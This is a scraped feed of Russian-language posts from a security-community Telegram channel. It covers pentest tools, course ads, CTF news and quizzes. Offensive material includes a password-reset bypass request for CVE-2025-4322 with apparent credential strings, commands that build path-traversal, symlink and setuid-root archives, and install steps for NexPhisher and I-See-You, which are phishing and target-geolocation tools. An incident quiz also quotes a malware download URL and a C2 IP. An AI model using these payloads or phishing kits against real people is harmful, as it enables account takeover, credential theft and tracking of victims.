Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
🟧 Ваш браузер вас выдаёт: как цифровые отпечатки разрушают анонимность
Вы чистите куки, включаете VPN и используете приватный режим? Это бесполезно. Ваш браузер всё равно оставляет уникальный след — цифровой отпечаток, по которому вас можно опознать среди миллионов.
Результат:
🟧
99.5% конфигураций оказались уникальными.
🟧
Даже Tor Browser, который активно борется с fingerprinting, можно идентифицировать с точностью до 50% при определенных настройках.
🟧
Изменение одного параметра (например, масштаба страницы) часто делает отпечаток еще более уникальным.
Полностью избежать fingerprinting сложно, но можно снизить рискиЧитать полностью…
Deepce: Утилита для анализа контейнеров Docker на уязвимости
Deepce (Docker Enumeration, Escalation, Privilege Container Escapes) — это мощный инструмент с открытым исходным кодом, предназначенный для анализа безопасности Docker-контейнеров. Разработанный для обнаружения уязвимостей, ошибок конфигурации и потенциальных путей для побега из контейнеров.
git clone https://github.com/stealthcopter/deepce.git
cd deepce
./deepce.sh
./deepce.sh -c <container_id>
./deepce.sh -a
Хотите находить уязвимости раньше хакеров?
Компании остро нуждаются в специалистах по кибербезопасности, способных выявлять и устранять уязвимости до их использования злоумышленниками.
Начните профессиональный путь в кибербезопасности. Запишитесь на курс «Профессия Пентестер» до 3 июля!
🟧 Регистрация здесь
В процессе обучения вас ждет:
🟧Практика на полигонах, повторяющих реальную бизнес-инфраструктуру
🟧Полноценная программа: от основ до продвинутых техник тестирования
🟧На всех этапах обучения вас будет сопровождать кураторская поддержка
Автор и куратор курса — Денис Соколов, эксперт с 10-летним опытом в информационной безопасности.😎
🚀 По всем вопросам пишите @Codeby_Academy
Дорожная карта Кибербезопасности для тех, кто не знает с чего начать
Читать полностью…🐳 dockershrink 🧠 — инструмент командной строки на базе искусственного интеллекта, который помогает уменьшить размер образов Docker. Cочетает в себе возможности алгоритмического анализа с генеративным искусственным интеллектом для применения передовых оптимизаций к вашим конфигурациям образов.
🧠 Автоматически способен применять такие методы, как многоэтапное создание сборок, переход на более лёгкие базовые образы, такие как alpine, и проверку зависимостей.
❓ Причина создание инструмента
Каждая организация, использующая контейнеры в средах разработки или производства, понимает, насколько сложно управлять сотнями или даже тысячами раздутых образов Docker в своей инфраструктуре. Это обусловлено наличием высоких затрат на хранение и передачу данных, длительным временем сборки, низкой производительностью разработчиков.
Проблема становится ещё более болезненной и дорогостоящей при использовании интерпретируемых языков, таких как Nodejs и Python. Приложениям, написанным на этих языках, необходимо упаковывать интерпретаторы и все их зависимости в образы контейнеров, что значительно увеличивает их размер.
🤯 Но существует возможность уменьшить размер образа Docker размером 1 ГБ до всего 100 МБ благодаря данному инструменту.
⭐️ Установка и использование
Скачать архив с двоичным файлом можно со страницы релизов.
Распаковать tar -xvzf dockershrink_0.1.7_linux_amd64.tar.gz
.
Для использования необходимо перейти в корневой каталог вашего проекта Node.js и запустить dockershrink:
# Для оптимизации существующих файлов, связанных с Docker
./dockershrink optimize
# Для создания новых файлов Docker
export OPENAI_API_KEY=...
./dockershrink generate
dockershrink optimize --openai-api-key <ваш ключ API OpenAI>
🚩 Новые задания на платформе HackerLab!
🕵️ Категория Форензика — Визуальный код
🌍 Категория Веб — Та самая заметка
——————————————
🗂 В архив добавлены задания с прошлых соревнований + райтапы:
🟠Реверс-инжиниринг - Добро пожаловать
🟠PWN - Казино
Приятного хакинга!
Naabu — твой цифровой лом: как сканировать порты быстрее Nmap
Naabu — это сканер портов, который помогает находить открытые порты на серверах, доменах и IP-адресах. В отличие от классического Nmap, он оптимизирован для скорости и удобства, поддерживает мультипоточность, сканирование по CIDR, спискам доменов и даже пассивное сканирование через сторонние сервисы.
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
sudo apt install naabu
naabu -h
naabu -host example.com
naabu -list domains.txt
naabu -host example.com -o results.txt
naabu -host example.com -nmap-cli "nmap -sV -A"
-top-ports
для проверки самых популярных портов naabu -host example.com -top-ports 100
-rate
naabu -host example.com -rate 1000
naabu -host example.com -exclude-ports 80,443Читать полностью…
😈 CVE-2025-4322: Как одна строка кода открыла двери тысяч сайтов хакерам
Представьте: ваш сайт внезапно перестаёт подчиняться вам. Вы не можете войти в админку, а вместо этого видите нового администратора с подозрительным именем. Через несколько часов сайт превращается в рассадник вредоносного кода или часть ботнета. Всё это — последствия критической уязвимости в популярной теме Motors, получившей идентификатор CVE-2025-4322.
Проблема кроется в виджете «Login Register», отвечающем за авторизацию и восстановление пароля. Хакеры нашли способ обойти проверку хэша, подменяя параметры запроса.
POST /reset-password HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
user_id=1&new_pass=Hacked123!&hash_check=%EF%BF%BD%EF%BF%BD%EF%BF%BD
Результат: злоумышленник получал доступ к админ-панели, создавал новые учётные записи и мог делать с сайтом что угодно.
Kurd@Kurd12123
или owm9cpXHAZTk
⤵️ Похожие уязвимости 🙃 ffufai
Инструмент, являющийся оболочкой на основе ИИ для популярного фаззера ffuf для более эффективного обнаружения уязвимостей. Автоматически предлагает расширения файлов для фаззинга на основе целевого URL-адреса и его заголовков, используя модели OpenAI GPT или Anthropic Claude. Полностью совместим с ffuf и работает с такими же параметрами.
📕 Возможности
⏺️"Умный" фаззинг веб-приложений с помощью ИИ;
⏺️Генерация подсказок для дальнейшего тестирования;
⏺️Идентификация проблем безопасности, которые могут быть упущены традиционными инструментами.
🐍 Установка
Клонируем репозиторий, переходим в папку с проектом, устанавливаем необходимые зависимости:
git clone https://github.com/jthack/ffufai
cd ffufai
pip install requests openai anthropic
chmod +x ffufai.py
sudo ln -s /<your_path>/ffufai.py /usr/local/bin/ffufai
export OPENAI_API_KEY='your-api-key-here'
export ANTHROPIC_API_KEY='your-api-key-here'
python3 ffufai.py
, иначе ffufai
:python3 ffufai.py -u https://example.com/FUZZ -w /path/to/wordlist.txt
#or
ffufai -u https://example.com/FUZZ -w /path/to/wordlist.txt
💥 67% всех утечек данных — из-за SQL-инъекций.
Если вы пентестер (или хотите им стать), вы обязаны уметь находить SQL-уязвимости. Это прямой путь к базе данных, админке, а иногда — к полному контролю над системой.
Где этому научиться?
На практическом курсе по SQL-инъекциям от Академии Кодебай!
🟧Запись на поток до 3 июля, а сейчас действует скидка 10% по промокоду SQL10!
На курсе вы научитесь:
🟧 понимать структуру SQL и писать запросы с нуля
🟧 внедрять SQL-код в уязвимые формы, параметры, cookies
🟧 раскручивать SQLi вручную и через Burp/SQLmap
🟧 закрывать такие уязвимости на бэке
Аналогов по объёму практики в СНГ и EN-сегменте просто нет.
🟧 Регистрируйтесь, пока действует скидка
🚀 По всем вопросам пишите @Codeby_Academy
⚡️ Угадайте уязвимость по описанию:
Злоумышленник отправляет жертве ссылку, которая выглядит как легитимный запрос на изменение пароля. Когда жертва кликает по ссылке, ее браузер выполняет действие от ее имени без ее ведома.
👇 Выбирайте вариант ответа!
Как построить успешную карьеру в тестировании на проникновение? Всё начинается с прочного базиса — тех знаний, без которых даже самые мощные инструменты останутся бесполезными.
В статье рассмотрим:
⭐Как эффективно изучить Linux, сети и Python
⭐Где получить реальную практику
⭐Ошибки новичков и как их избежать
Среди обилия информации системный подход к обучению становится ключевым.
Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
⭐Освоить практические навыки пентеста
⭐Подготовиться к экзамену OSCP
⭐Получить практические задания с экспертной проверкой
➡️ Читайте полный гайд
Киберпреступления оставляют цифровые следы. Научитесь их находить.
Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.
Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!
⌨️ Регистрация здесь
Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО
Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику
Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас
🚀 @Codeby_Academy
🔍 Киберрасследование: Кто украл данные?
Вы — SOC-аналитик. В сети компании обнаружена утечка конфиденциальных файлов. Вот что удалось собрать:
*️⃣В 09:15 сотрудник получил письмо с темой «Договор о защите информационных систем №-4513 на подпись» от якобы доверенного контрагента.
*️⃣В 09:20 он открыл вложение — файл contract_scanned.exe, маскирующийся под PDF.
*️⃣В 09:22 на его ПК (Windows 10) запустился процесс msbuild.exe с необычными аргументами:
/tmp:7a3f1 /payload:http://malware[.]xyz/get.dll
*️⃣ В 09:25 этот процесс подключился к IP 91.234.18.77 (порт 8443) и начал массово копировать файлы из сетевой папки \\NAS\Information\.
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Последний танец
🔎 Категория OSINT — Народный автомобиль
Приятного хакинга!
Как найти слабые места в веб-приложении до того, как их найдут хакеры?
Расскажем на курсе WAPT от Академии Кодебай! 🛡 Это на 100% практический курс по пентесту, где вы попробуете изученные техники взлома в 65-ти заданиях нашей лаборатории!
🔴 Каждую неделю — вебинары с куратором! Старт 3 июля. Регистрация здесь.
Содержание курса:
✦ эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг
✦ SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
✦ техники повышения привилегий, Client-side атаки (XSS, CSRF)
Получите практические навыки как в рабочих задачах, так и в Bug Bounty. 🚀 По всем вопросам пишите @Codeby_Academy
«Постучись в мою дверь» или распространенные способы реализации Initial Access.
🚪 Initial Access (первоначальный доступ) – это первый и один из самых важных этапов в цепочке кибератаки, при котором злоумышленник получает точку входа во внутреннюю инфраструктуру организации.
🟧Данный этап особо важен, так как после его реализации у злоумышленника «открываются двери» для выполнения дальнейших этапов Cyber-Kill Chain: закрепление в инфраструктуре, вертикальное и горизонтальное передвижение, эксфильтрация данных и т.д.
Основные методы Initial Access:
🌟Фишинг и целевой фишинг (Spear Phishing): рассылка электронных писем с вредоносными вложениями или ссылками, которые маскируются под легитимное письмо какого-нибудь внутреннего сотрудника или подрядчика
🌟Эксплуатация уязвимостей общедоступных приложений: это могут быть веб-приложения, серверы, базы данных, имеющие уязвимости, которые злоумышленники могут успешно реализовать для получения первичного доступа
🌟Внешние удаленные сервисы: часто атакующие пытаются проникнуть в сеть организации через сервисы удаленного доступа, такие как RDP, VPN или SSH. Если конфигурация данных сервисов плохо настроена с точки зрения безопасности, то создается прямая «дверь» во внутреннюю сеть.
Почему Initial Access так важен?
⚙️ Без первоначального доступа атака не может развиваться, именно поэтому защита на данном этапе максимально важна.
Регулярное обновление сервисов, обучение сотрудников, мониторинг событий ИБ, внедрение новых СЗИ – все это звучит также просто, как и закрыть входную в квартиру на замок, но, к сожалению, не все всерьез воспринимают данную мелочь.
I-See-You
ISeeYou — это инструмент Bash и Javascript для определения точного местоположения пользователей во время социальной инженерии или фишинговых атак. Используя точные координаты местоположения, злоумышленник может провести предварительную разведку, которая поможет ему в выполнении дальнейших целевых атак.
📎Установка из источника:
git clone https://github.com/Viralmaniar/I-See-You.git
cd I-See-You
chmod +x ISeeYou.sh
sudo ./ISeeYou.sh
📣 Внимание, сообщество Codeby.net! Пришло время показать нашу силу! 📣
Как основатель Codeby.net, я хочу поблагодарить каждого из вас за то, что вы делаете наш форум живым и полезным. Мы — действительно ведущее комьюнити по кибербезопасности, и это ваша заслуга! 🌟
Чтобы продолжать расти и укреплять наши позиции, нам нужна ваша помощь. Ваш отзыв о Codeby.net на Яндексе — это мощный инструмент для привлечения новых участников и повышения узнаваемости нашего общего дома.
Как это сделать? Мы подготовили подробную инструкцию для ПК и мобильных устройств!
✨ Читайте статью и оставляйте свой след в истории Codeby.net
Ваш голос важен. Сделайте свой вклад прямо сейчас! ✨
Кто такие эти ваши группировки?
😱APT-группировки (Advanced Persistent Threat) – это высококвалифицированные группы хакеров, которые осуществляют сложные и целенаправленные на конкретную сферу или организацию атаки с целью получения конфиденциальных данных.
В чем особенности таких группировок?
⚫Наличие значительных ресурсов и технических знаний
⚫Тщательное планирование атаки и поэтапная реализация, от разведки до эксфильтрации данных (в среднем от 3-х месяцев до 2 лет)
⚫Эксплуатация ранее неизвестных уязвимостей или Zero-day (уязвимости нулевого дня)
⚫Узконаправленное действие, начиная от отрасли и заканчивая конкретной организацией
💻APT-группировки в настоящее время представляют серьезную угрозу для бизнеса и государства. Группировки, чья активность была зафиксирована в ближайшее время на территории СНГ - Vengeful Wolf, Paper Werewolf и Hoody Hyena.
🛡 Внедрение TI процессов поможет заранее подготовиться к атаке APT-группировок и предотвратить большие последствия, вплоть до реализации недопустимых событий.
📞 PhoneInfoga
Один из самых продвинутых инструментов для сканирования международных телефонных номеров. Он позволяет сначала собрать стандартную информацию, такую как страна, регион, оператор связи о любом международном телефонном номере, а затем выполнить поиск в поисковых системах, чтобы попытаться найти поставщика услуг VoIP или определить владельца.
Установку можно произвести путем скачивания бинарного файла со страницы релизов. Далее необходимо распаковать архив:
tar -xvzf phoneinfoga_Linux_x86_64.tar.gz
phoneinfoga scan --number "+33 06 79368229"
phoneinfoga serve -p 8080
http://localhost:8080
Читать полностью…
Каждый пентестер знает, когда стандартные инструменты бессильны, нужен свой код. В таких случаях умение программировать становится критически важным. И здесь Python — идеальный выбор для начала.
🟧Почему стоит выбрать Python? Прост в изучении, мощный, с богатыми библиотеками и работает везде.
О чём расскажем в статье?
🟡С чего начать изучение — подборка лучших ресурсов для старта
🟡Первый проект — какой скрипт написать в первую очередь
🟡Дальнейшее развитие — как прокачать навыки для реальных задач
🟧 Начать программировать проще, чем кажется. Главное — правильный подход. Как именно выстроить эффективное обучение и избежать типичных ошибок ➡️ читайте в статье.
🟧 Готовы к своему первому CTF? Пошаговый план для новичков!
Хотите попробовать свои силы в capture the flag, но не знаете, с чего начать? Это не «еще один гайд», а практический маршрут по всем ключевым этапам:
🟧 Что такое CTF - терминология, функционал и форматы задач
🟧 OSINT-разведка - как собирать важную информацию перед атакой
🟧 Стеганография - от спрятанных данных в картинках до HEX-редакторов
🟧 Реверс-инжиниринг, анализ трафика и работа с Wireshark для реального понимания системы …и многое другое по алгоритму: сбор → анализ → эксплуатация!
Это не только теория, а «генератор навыков» для реальных CTF — разобранных подробно и с понятными примерами. Возьмите свое: пошаговый план, инструменты и первые практические кейсы — идеально для старта и прокачки в ИБ.
🟧 Читать полностью: «Как подготовиться к своему первому CTF: пошаговый план для новичков»
🌐 Setezor — швейцарский нож для анализа и проектирования сетевой инфраструктуры. Данный инструмент будет полезен пентестерам, сетевикам, системным администраторам.
😮 Функционал
⏺️Работа с веб-интерфейсом;
⏺️Разделение на проекты;
⏺️Табличное представление данных с возможность применения фильтров, экспорт в формате электронной таблицы;
⏺️Генерация снимка экрана веб-ресурса;
⏺️Поиск программного обеспечения по узлам сети;
⏺️Активное и пассивное сканирование с использованием nmap, masscan и scapy;
⏺️Парсинг pcap-файлов, xml-логов сканирования nmap, xml/list/json-логов сканирования masscan;
⏺️Получение информации организовано в виде задач, при изменении статуса задачи всплывает уведомление;
⏺️Получение списка уязвимостей для конкретного ПО посредством интеграции с search-vulns;
⏺️Формирование отчёта по найденным уязвимостям;
⏺️Поиск сетевых узлов по протоколу SNMP и сбор установленного программного обеспечения;
⏺️Автоматическое построение карты сети на L3 уровне;
⏺️Поиск субдоменов через DNS;
⏺️Получение SSL сертификата;
⏺️Получение детальной информации о регистре домена;
⏺️HTTP REST API – унифицированный веб-интерфейс для взаимодействия с клиентской частью приложения и интеграциями с другими информационными системами.
✨ Установка и запуск
Скачать установочный DEB-пакет. При установке убедиться, что вы расположены в директории с DEB-пакетом, иначе прописать полный путь. Далее объявляем переменные окружения:
sudo apt install ./setezor_<версия>.deb
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef
setezor
.setezor -s -p <port>
archivealchemist — инструмент для создания специально разработанных архивов для тестирования уязвимостей при извлечении данных.
❗️Характеристики
⏺️Создание ZIP- и TAR-архивов с вредоносными шаблонами;
⏺️Поддержка атак с обходом пути;
⏺️Поддержка символических и жестких ссылок;
⏺️Возможность устанавливать специальные биты разрешений (setuid, setgid, sticky bit);
⏺️Точный контроль над атрибутами файлов (режим, владелец, группа, время изменения);
⏺️Команды манипулирования: добавить, заменить, дополнить, изменить;
⏺️Вспомогательные команды: извлечение, список, чтение;
⏺️Создание файлов polyglot (дополните архив данными + настройте заголовки).
⬇️Установка
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:
git clone https://github.com/avlidienbrunn/archivealchemist
cd archivealchemist
chmod +x archive-alchemist.py
sudo ln -s $(pwd)/archive-alchemist.py /usr/local/bin/archive-alchemist
archive-alchemist zipslip.zip add "../../../tmp/evil.txt" --content "I escaped the extraction directory!"
archive-alchemist symlink_attack.tar -t tar add .bashrc --symlink "/etc/passwd"
archive-alchemist setuid_attack.tar -t tar add exploit --content "#!/bin/sh\nwhoami" --mode 0755 --setuid --uid 0
archive-alchemist polyglot.gif add payload.txt --content "hello there"
⚡️ Угадай уязвимость по коду:
В приложении есть следующий код:
SELECT * FROM users WHERE username = '" + userInput + "' AND password = '" + userPassword + "';
NexPhisher
NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.
💡Основные функции:
⏺️Выбор нескольких сервисов - Утилита имеет большой выбор, до 30 сервисов.
⏺️Понятный интерфейс - Программа очень простая и справится каждый.
⏺️Большой выбор хоста - есть известные Ngrok, Serveo и новые LocalHostRun, LocalXpose.
📎Установка:
git clone https://github.com/htr-tech/nexphisher.git
cd nexphisher
./setup
bash nexphisherЧитать полностью…
😶🌫️ Забыл всё, чему учился по ИБ? Это не провал — это сигнал к действию!
В нашей новой статье «Я ничего не помню: как не забыть выученное. Методы обучения для информационной безопасности» вы узнаете:
✔️ Почему стандартные подходы не работают — и как мозг теряет новую инфу
✔️ Эффективные техники запоминания: интервальное повторение, карточки, мнемоника
✔️ Как превратить знания в привычку: как организовать расписание, работать с микрозадачами, фиксировать успехи
✔️ Практические советы для профи ИБ: как учить OSINT‑инструменты, CTF‑задачи, анализ уязвимостей — без выгорания
Статья — без воды, с реальными техниками, ссылками и примерами для применения уже сегодня.
➡️ Читайте и закрепляйте свои знания навсегда!
Фрустрация в CTF: почему опускаются руки и как с этим бороться
🟧Каждый, кто участвовал в CTF, знает это чувство: задача кажется нерешаемой, время уходит, а флаг так и не поддается.
В новой статье разбираем:
🟧Почему возникает фрустрация в CTF (и почему это нормально)
🟡Практические способы выйти из ступора
🟡Как сохранить мотивацию, даже когда всё кажется безнадежным
🟡Где искать помощь и вдохновение
🟧Советы подойдут и новичкам, и опытным игрокам. Главное — понять: трудности не означают поражение.
🟧 Читайте в статью, применяйте рекомендации, и пусть ни один флаг не устоит!